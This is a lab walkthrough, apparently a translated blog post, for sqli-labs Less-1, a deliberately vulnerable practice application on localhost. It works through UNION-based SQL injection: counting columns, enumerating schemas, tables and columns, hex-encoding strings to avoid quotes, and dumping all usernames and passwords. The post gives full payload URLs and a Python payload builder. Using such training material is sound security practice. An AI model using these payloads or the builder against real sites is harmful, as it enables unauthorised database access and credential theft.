
Sqli-labs less-01

2022-06-11 06:01:00 visionkiwi

MySQL basics

 List the databases: select schema_name from information_schema.schemata;
 List the tables in a database: select table_name from information_schema.tables where table_schema='security';
 List the columns of a table: select column_name from information_schema.columns where table_name='users';
 Read the fields: select username,password from security.users;

less-01

Connect to the database: mysql -h127.0.0.1 -uroot -proot

show databases;
use security;
select * from users where id='1' LIMIT 0,1;    -- the query Less-1 runs for ?id=1


limit 0,1;  The first number is the offset: 0 means start at the first row. The second number is how many rows to return: 1 means show one row.


 In the SQL statement:
--+ : two dashes followed by a plus sign; in the URL the + is decoded to a space, giving "-- " (MySQL requires a space after the two dashes)
-- : two dashes followed by a space
# : hash sign (send it URL-encoded as %23, otherwise the browser treats it as a fragment and never sends it to the server)
 All three start a comment: whatever follows the symbol is not executed, so the rest of the original query (here ' LIMIT 0,1) is discarded.
 Also in the SQL statement:
or / and
A and B : true only when both A and B are true
A or B : true when at least one of A and B is true
order by number:
number is the position of the column to sort by; if it is larger than the number of columns the query errors, which is how the column count is discovered


 Ordering by the fifth column fails: the result has no fifth column.


 Trying it in mysql shows the Less-1 query returns three columns: order by 3 succeeds, order by 4 fails.


 Now it is known that there are three columns, 1,2,3,
 so union can be used.
 Change id=1 to id=-1 so that the original query matches no row; the row produced by the SQL after union is then the first (and only) row the page displays.


 Now name shows 2
 and password shows 3.
 This means columns 2 and 3 are echoed on the page, so data can be pulled out through them.


Basic usage of functions

system_user()           # synonym of user(): the user@host the client connected as
user()                  # the user@host the client connected as
current_user()          # the account actually used for privilege checks
database()              # database currently in use
version()               # MySQL version string
@@datadir               # MySQL data directory
@@version_compile_os    # operating system MySQL was built for



 Since column 3 is echoed, position 3 is used to query the database list.
 Without a limit the page shows only the first database.


 Use limit to pull out more rows.
 The web page displays only one row at a time,
 so keep the column position fixed and step through the limit offset to read the rows one by one.



 Reading rows one at a time is slow, so use
group_concat()
 which joins all the rows into a single line of output (note that its result is truncated at group_concat_max_len, 1024 bytes by default, so very long listings may need to be split).


 This lists the databases in the MySQL instance:
information_schema,challenges,mysql,performance_schema,security,sys

 Next, work on security and get the tables in it:
emails,referers,uagents,users


 The previous step used table_schema='security'.
 Single quotes are not recommended in the payload: they are the first thing an escaping routine or filter targets.
 
 Remove them by writing the string as a hex literal prefixed with 0x, so security becomes 0x7365637572697479.
 Select security in an encoder tool, open Encoding and choose Hex Encode to get the value.



 Now work on the users table.
 Likewise the string inside the '' is converted to hex: users becomes 0x7573657273.


 Pull username and password out of users.
 Use a concatenation function: concat_ws('~~',A,B) produces A~~B

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1'union select 1,2,group_concat(concat_ws('~~',username,password)) from security.users --+

 which is equivalent to

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1'union select 1,2,group_concat(concat_ws(0x7e7e,username,password)) from security.users --+

 Try to replace every string in single quotes with its 0x hex form ('~~' is 0x7e7e).
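The following is an added example, not code from the original post: a small Python payload builder covering the two encoding points made above, the comment terminators (--+ versus #) and the 0x hex literals that replace quoted strings. BASE is the Less-1 URL from the page; everything else is a hypothetical helper written for this walkthrough.

```python
import binascii
from urllib.parse import quote

# The Less-1 URL used throughout the page.
BASE = "http://127.0.0.1/sqli-labs-php7-master/Less-1/"

# Comment terminators as they must look in the decoded SQL.
COMMENTS = {"dashes": "-- ", "hash": "#"}


def hex_literal(s):
    """String as a MySQL 0x... literal, so no quote characters are needed.
    MySQL reads 0x7365637572697479 as the string 'security' in a string context."""
    return "0x" + binascii.hexlify(s.encode()).decode()


def from_hex_literal(lit):
    """Inverse of hex_literal: check a literal before sending it."""
    if not lit.startswith("0x"):
        raise ValueError("not a 0x literal")
    return binascii.unhexlify(lit[2:]).decode()


def tables_payload(schema="security"):
    """Table names of a schema, schema written as hex (no quotes in the literal)."""
    return ("-1' union select 1,2,group_concat(table_name) "
            f"from information_schema.tables where table_schema={hex_literal(schema)}")


def columns_payload(schema="security", table="users"):
    """Column names; filtering on the schema too avoids a same-named table elsewhere."""
    return ("-1' union select 1,2,group_concat(column_name) "
            "from information_schema.columns "
            f"where table_schema={hex_literal(schema)} and table_name={hex_literal(table)}")


def dump_payload(sep="~~"):
    """username~~password for every row, separator as hex (the page's 0x7e7e)."""
    return ("-1' union select 1,2,group_concat(concat_ws("
            f"{hex_literal(sep)},username,password)) from security.users")


def build_url(payload, comment="dashes", base=BASE):
    """Percent-encode the injected id. The space after -- becomes %20 (what the
    page's --+ achieves with +) and # becomes %23, so it reaches the server
    instead of being dropped by the browser as a URL fragment."""
    return f"{base}?id={quote(payload + COMMENTS[comment], safe='')}"


if __name__ == "__main__":
    print(hex_literal("security"), hex_literal("users"), hex_literal("~~"))
    print(build_url(tables_payload()))
    print(build_url(columns_payload(), "hash"))
    print(build_url(dump_payload()))
```

Printing the URLs and pasting them into the browser reproduces the page's steps; the generated id never contains a quoted string literal, only the leading ' that closes the original id='...' value.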


Summary

1. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=1'    # probe for injection: the stray quote breaks the query and Less-1 prints the MySQL error
2. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' order by 3 --+ # find the number of columns (order by 4 errors)
3. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,3 --+ # see which column positions are echoed
4. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,database() --+ # current database
5. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,schema_name from information_schema.schemata limit 4,1 --+   # the fifth database, security

 Or:

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+    # all databases at once

6. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security' limit 1,1 --+    # one table at a time (here the second one)

 Or:

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+    # all tables at once

7. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,column_name from information_schema.columns where table_schema='security' and table_name='users' --+    # one column at a time (filter on the schema too, since another database may also have a table called users)

 Or:

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+   # all columns at once

8. http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,concat_ws('~~',username,password) from security.users limit 1,1 --+   # one account and password (here the second row)

 Or:

http://127.0.0.1/sqli-labs-php7-master/Less-1/?id=-1' union select 1,2,group_concat(concat_ws('~~',username,password)) from security.users --+   # all accounts and passwords at once, each pair separated by ~~


Copyright notice
This article was written by [visionkiwi]; please include a link to the original when reposting. Thanks.
https://yzsam.com/2022/03/202203020531049967.html